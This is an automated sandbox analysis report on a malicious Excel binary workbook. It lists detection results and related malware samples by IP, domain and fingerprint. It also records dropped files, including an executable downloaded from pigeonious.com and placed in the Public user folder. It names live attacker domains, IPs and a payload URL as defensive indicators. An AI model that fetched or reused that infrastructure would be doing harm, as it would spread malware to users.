                                                                                                                        General Information

                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                        Analysis ID:432839
                                                                                                                        Start date:10.06.2021
                                                                                                                        Start time:20:29:54
                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                        Overall analysis duration:0h 10m 55s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Sample file name:Current-Status-062021-81197.xlsb
                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                        Number of analysed new started processes analysed:22
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • HDC enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.expl.evad.winXLSB@5/8@2/2
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HDC Information:
                                                                                                                        • Successful, ratio: 35.3% (good quality ratio 32.5%)
                                                                                                                        • Quality average: 82.1%
                                                                                                                        • Quality standard deviation: 30.9%
                                                                                                                        HCA Information:Failed
                                                                                                                        Cookbook Comments:
                                                                                                                        • Adjust boot time
                                                                                                                        • Enable AMSI
                                                                                                                        • Found application associated with file extension: .xlsb
                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                        • Attach to Office via COM
                                                                                                                        • Scroll down
                                                                                                                        • Close Viewer
                                                                                                                        Warnings:
                                                                                                                        Show All
                                                                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 184.30.21.144, 104.43.139.144, 52.109.32.63, 52.109.8.22, 52.109.76.33, 40.88.32.150, 52.255.188.83, 20.50.102.62, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 20.75.105.140, 20.54.26.129, 20.72.88.19, 20.190.160.75, 20.190.160.2, 20.190.160.71, 20.190.160.4, 20.190.160.134, 20.190.160.69, 20.190.160.73, 20.190.160.132, 51.11.168.232, 20.49.150.241, 51.124.78.146
                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        20:30:52API Interceptor1x Sleep call for process: WMIC.exe modified

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        193.178.169.243logo.png.exeGet hashmaliciousBrowse
                                                                                                                          3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                            tmp_Client-Status-062021-952177.vbsGet hashmaliciousBrowse
                                                                                                                              95.142.44.933F97s4aQjB.xlsxGet hashmaliciousBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                pigeonious.com3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                injuryless.comlogo.png.exeGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243
                                                                                                                                3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243
                                                                                                                                tmp_Client-Status-062021-952177.vbsGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243

                                                                                                                                ASN

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                VDSINA-ASRUlogo.png.exeGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243
                                                                                                                                3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243
                                                                                                                                uew5jAHqCT.exeGet hashmaliciousBrowse
                                                                                                                                • 109.234.38.213
                                                                                                                                APPkj4zf3F.exeGet hashmaliciousBrowse
                                                                                                                                • 94.103.93.224
                                                                                                                                tmp_Client-Status-062021-952177.vbsGet hashmaliciousBrowse
                                                                                                                                • 193.178.169.243
                                                                                                                                N1LUjx76rV.exeGet hashmaliciousBrowse
                                                                                                                                • 109.234.35.229
                                                                                                                                0izHwHXyfm.exeGet hashmaliciousBrowse
                                                                                                                                • 109.234.35.229
                                                                                                                                gtJl8IPauk.exeGet hashmaliciousBrowse
                                                                                                                                • 109.234.35.229
                                                                                                                                tAL6n3gs6p.exeGet hashmaliciousBrowse
                                                                                                                                • 109.234.35.229
                                                                                                                                f1GoI1S7Qi.exeGet hashmaliciousBrowse
                                                                                                                                • 94.103.93.224
                                                                                                                                SecuriteInfo.com.Troj.Kryptik-TR.10844.exeGet hashmaliciousBrowse
                                                                                                                                • 193.178.170.41
                                                                                                                                SecuriteInfo.com.Troj.Kryptik-TR.30930.exeGet hashmaliciousBrowse
                                                                                                                                • 193.178.170.41
                                                                                                                                S5.exeGet hashmaliciousBrowse
                                                                                                                                • 62.113.114.79
                                                                                                                                A5A2471193648C16E45C9C053C8672A3F71F21862388C.exeGet hashmaliciousBrowse
                                                                                                                                • 94.103.85.106
                                                                                                                                PZ33n8HQNu.exeGet hashmaliciousBrowse
                                                                                                                                • 62.113.119.33
                                                                                                                                VofcOsB5QO.exeGet hashmaliciousBrowse
                                                                                                                                • 94.103.86.101
                                                                                                                                8vH1bonSn8.exeGet hashmaliciousBrowse
                                                                                                                                • 94.103.86.101
                                                                                                                                87PLLTuhpG.exeGet hashmaliciousBrowse
                                                                                                                                • 178.208.83.27
                                                                                                                                AC09B75D9728CEA73319605AEE734B0B776E2D1677914.exeGet hashmaliciousBrowse
                                                                                                                                • 195.2.78.227
                                                                                                                                file3.exeGet hashmaliciousBrowse
                                                                                                                                • 62.113.117.9
                                                                                                                                EUROBYTEEurobyteLLCMoscowRussiaRU3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                template-jn02b3.dotGet hashmaliciousBrowse
                                                                                                                                • 95.142.40.220
                                                                                                                                PREMIUM FINANCE AGREEMENT.docxGet hashmaliciousBrowse
                                                                                                                                • 95.142.40.241
                                                                                                                                PREMIUM FINANCE AGREEMENT.docxGet hashmaliciousBrowse
                                                                                                                                • 95.142.40.220
                                                                                                                                l8Cu5Vky6C.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.154.52.100
                                                                                                                                l8Cu5Vky6C.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.154.52.100
                                                                                                                                PooYhdlQZY.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.154.52.100
                                                                                                                                PooYhdlQZY.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.154.52.100
                                                                                                                                sUeyYgEiCb.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.154.52.100
                                                                                                                                794c5aa1_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                njAzoIkDJu.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                U92T8qzIbi.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                rUUR0qQI22.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                scan_DHL39382493.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.34
                                                                                                                                3UiiwuZ4YR.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.135
                                                                                                                                5WIxZYV73V.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                0anROWjIhR.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                fast.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                kinsing2Get hashmaliciousBrowse
                                                                                                                                • 185.154.53.140
                                                                                                                                kinsingGet hashmaliciousBrowse
                                                                                                                                • 185.154.53.140

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                37f463bf4616ecd445d4a1937da06e19logo.png.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                Docc.htmlGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                askinstall39.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                Lista e porosive.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                askinstall39.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.46459351.411.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                Yl6482CO6U.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243
                                                                                                                                ZmZvKByoew.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.93
                                                                                                                                • 193.178.169.243

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                C:\Users\Public\SettingSyncHost3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png3F97s4aQjB.xlsxGet hashmaliciousBrowse

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\Public\SettingSyncHost
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):511488
                                                                                                                                    Entropy (8bit):7.3404073760047375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
                                                                                                                                    MD5:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    SHA1:78A40D523F4B887B2383681FECE447EF911C24EF
                                                                                                                                    SHA-256:28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
                                                                                                                                    SHA-512:F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3F97s4aQjB.xlsx, Detection: malicious, Browse
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p....,...,...,..,...,...,...,...,...,...,...,...,...,.).,...,..,...,...,...,Rich...,........................PE..L......`.....................~......#.............@..........................P............@.....................................(.......6.................... .......................................................................................text...9........................... ..`.rdata..............................@..@.data...|....p.......X..............@....idata...............r..............@....rsrc...6............~..............@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\091AD497-E671-4FDF-8396-74EDF92EBBCF
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):134922
                                                                                                                                    Entropy (8bit):5.369119258003808
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:4cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:gEQ9DQW+ziXOe
                                                                                                                                    MD5:042D3F746892226A7BE71431B6635EBD
                                                                                                                                    SHA1:A171A408788DD9EE855D4C87E960E98CF4C43ED0
                                                                                                                                    SHA-256:F0FF8798D6B5E8D85FADFF08F7A9974F0843DF23BE340F28B886C9E84F0BB6FC
                                                                                                                                    SHA-512:9AAF01336D99A1754C9C1B5AB6AEA9402CC2FB9B821656FBF4FBDF8DD9912BB805526D6974AB4F650D293A2D33779B9C16BEAB621E404CE8EF2A29E7AD9F8E40
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T18:30:47">.. Build: 16.0.14209.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\49018F97.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PNG image data, 2186 x 1539, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):462772
                                                                                                                                    Entropy (8bit):7.968569347884841
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:yycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAdee:yQMfYBVf1xBARkgaNyr
                                                                                                                                    MD5:5D1C907B7A28ED91D8A704A7CE928FAF
                                                                                                                                    SHA1:FA56635F0C2A6D93DABE3E0636DADEAECDFCE804
                                                                                                                                    SHA-256:AD72EF87E54764A13E87BBD446029F48D70114B120E6DA7025947B1D51554486
                                                                                                                                    SHA-512:52A22A801395A467AABC02B4C24236FCAC4197407FC0F5C4B0D9C79C8DFB9A5DD0D935C67A7730B7EBFCD80013967F392D48D6E697A09E684BCDC62F7DBB6376
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: .PNG........IHDR..............I.\....sRGB.........gAMA......a.....pHYs..!...!..........IDATx^...W.Y.7~...o=.33..&+..9.q.H..1..1.b..9+.P0G.E...T..$%.wk.......i..Y{.r.S....s..................!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z..
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):511488
                                                                                                                                    Entropy (8bit):7.3404073760047375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
                                                                                                                                    MD5:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    SHA1:78A40D523F4B887B2383681FECE447EF911C24EF
                                                                                                                                    SHA-256:28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
                                                                                                                                    SHA-512:F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3F97s4aQjB.xlsx, Detection: malicious, Browse
                                                                                                                                    Reputation:low
                                                                                                                                    IE Cache URL:https://pigeonious.com/img/logo.png
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p....,...,...,..,...,...,...,...,...,...,...,...,...,.).,...,..,...,...,...,Rich...,........................PE..L......`.....................~......#.............@..........................P............@.....................................(.......6.................... .......................................................................................text...9........................... ..`.rdata..............................@..@.data...|....p.......X..............@....idata...............r..............@....rsrc...6............~..............@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\A6B40000
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1041070
                                                                                                                                    Entropy (8bit):7.855884638864563
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:Qp4WH4vcCRa6p1RtTycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAde5:O4vdRa6p1Rt/QMfYBVf1xBARkgaNys
                                                                                                                                    MD5:A6832F006ECA34E5E7495F7A3B5ADC6B
                                                                                                                                    SHA1:801FE0D57B16BFF66056840CD47BEED33B4ABB5C
                                                                                                                                    SHA-256:8DE78336A3BD486ABFE0B3DF88EFC9AD8BF2A64BF309C7107565F16BF838F757
                                                                                                                                    SHA-512:F7CC6E711DB08682BF125388C1395696A9073A236BB8196647DA27A4B53F450373D3BC52A1EAFCDB017108845450A469FFA14E1859DA419FE18135E3C7FD0EBF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22
                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                    C:\Users\user\Desktop\~$Current-Status-062021-81197.xlsb
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):165
                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                    Malicious:true
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    \Device\ConDrv
                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):160
                                                                                                                                    Entropy (8bit):5.083203110114614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgjd330qJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/eg1deAin
                                                                                                                                    MD5:C62814DB19512E50685CCD10C45F4557
                                                                                                                                    SHA1:91CB5A204B91F9F81D791B07AACBE4CB2A79CC85
                                                                                                                                    SHA-256:FBDC5DD1D2DA5FEACF83F4FF1781A49DEDA141E18E33326B92B66D8D49C6725F
                                                                                                                                    SHA-512:7608BF46F85343150B8B4BD37FD994EEE0CE3D61BF5613A8D1DD3C93DD2B11E63190D419140DFE5A7AFED08E88C8B3C592E5241E4C048E6D670747A522B1D4FD
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 1808;...ReturnValue = 0;..};....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Zip archive data, at least v2.0 to extract
                                                                                                                                    Entropy (8bit):7.994144310692157
                                                                                                                                    TrID:
                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.73%
                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.88%
                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                    File name:Current-Status-062021-81197.xlsb
                                                                                                                                    File size:468533
                                                                                                                                    MD5:1ac719c744d22f42e4978e7b55828435
                                                                                                                                    SHA1:4ddc7358f615987bf92ed9192430693db65b097c
                                                                                                                                    SHA256:d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb
                                                                                                                                    SHA512:736bcf96ca99c893c535c555133a092400e1dbc5f5143500d152c537bccc9d3faf7d541b3b11be82b68bbf4c7a1528c5fa3b45394d5b2b958c4d1d4d024e7d22
                                                                                                                                    SSDEEP:12288:ag+iWCVTHlJFnI6TDEeTSH/NJDjXcXdeanuxZ2:4iVVTHxNcoSJDK1nuxA
                                                                                                                                    File Content Preview:PK...........R................docProps/PK..........!.,...............docProps/app.xml.S.N.0.....`.N...Zu.#T.XQ.....u&.EbG.......m.ZNp{3o........"-8....x.Q.F.\.ML......x.&..5...xz-...Kg.p... a|LK.f..W%....m.SXWK...0[.Z..U.5.d.Qt.`.`r./.^..)N[..hn.....vM...

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "Current-Status-062021-81197.xlsb"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:
                                                                                                                                    Application Name:
                                                                                                                                    Encrypted Document:
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:

                                                                                                                                    Macro 4.0 Code

